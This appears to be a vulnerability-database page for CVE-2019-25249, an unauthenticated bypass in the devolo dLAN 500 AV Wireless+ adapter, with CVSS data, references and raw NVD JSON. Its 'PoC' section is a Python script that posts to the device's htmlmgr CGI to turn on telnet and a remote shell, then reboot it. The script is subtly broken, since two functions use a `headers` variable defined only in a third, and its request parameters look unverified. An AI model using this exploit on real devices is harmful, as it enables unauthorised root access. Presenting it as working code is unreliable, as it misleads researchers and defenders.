Security Vulnerability Report
CVE-2019-25249 CVSS 9.8 CRITICAL

CVE-2019-25249

Published: 2025-12-24 20:15:53
Last Modified: 2026-04-15 00:35:42

Description

devolo dLAN 500 AV Wireless+ 3.1.0-1 contains an authentication bypass vulnerability that allows attackers to enable hidden services through the htmlmgr CGI script. Attackers can enable telnet and remote shell services, reboot the device, and gain root access without a password by manipulating system configuration parameters.

CVSS Details

CVSS Score (v3.1)
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No structured configuration data is available for this record; the affected product and version named in the description are:

devolo dLAN 500 AV Wireless+ 3.1.0-1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2019-25249 PoC - devolo dLAN 500 AV Wireless+ Authentication Bypass Discovered by: [email protected] """ import requests import sys target = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.1.1" def enable_telnet(target): """Enable hidden telnet service via htmlmgr CGI""" url = f"{target}/htmlmgr" headers = { "Content-Type": "application/x-www-form-urlencoded" } # Bypass authentication and enable telnet data = { "action": "set_config", "telnet": "1", "telnet_port": "23" } response = requests.post(url, data=data, headers=headers, timeout=10) return response.status_code == 200 def enable_remote_shell(target): """Enable remote shell service""" url = f"{target}/htmlmgr" data = { "action": "set_config", "remote_shell": "1" } response = requests.post(url, data=data, headers=headers, timeout=10) return response.status_code == 200 def reboot_device(target): """Reboot the device""" url = f"{target}/htmlmgr" data = { "action": "reboot" } response = requests.post(url, data=data, headers=headers, timeout=10) return response.status_code == 200 if __name__ == "__main__": print(f"[*] Targeting: {target}") print("[*] Attempting to enable telnet...") if enable_telnet(target): print("[+] Telnet service enabled successfully") print("[*] Attempting to enable remote shell...") if enable_remote_shell(target): print("[+] Remote shell enabled successfully") print("[*] Rebooting device...") reboot_device(target) print("[+] Device reboot initiated")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25249", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:53.247", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "devolo dLAN 500 AV Wireless+ 3.1.0-1 contains an authentication bypass vulnerability that allows attackers to enable hidden services through the htmlmgr CGI script. Attackers can enable telnet and remote shell services, reboot the device, and gain root access without a password by manipulating system configuration parameters."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://www.devolo.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46325", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5508.php", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5508.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}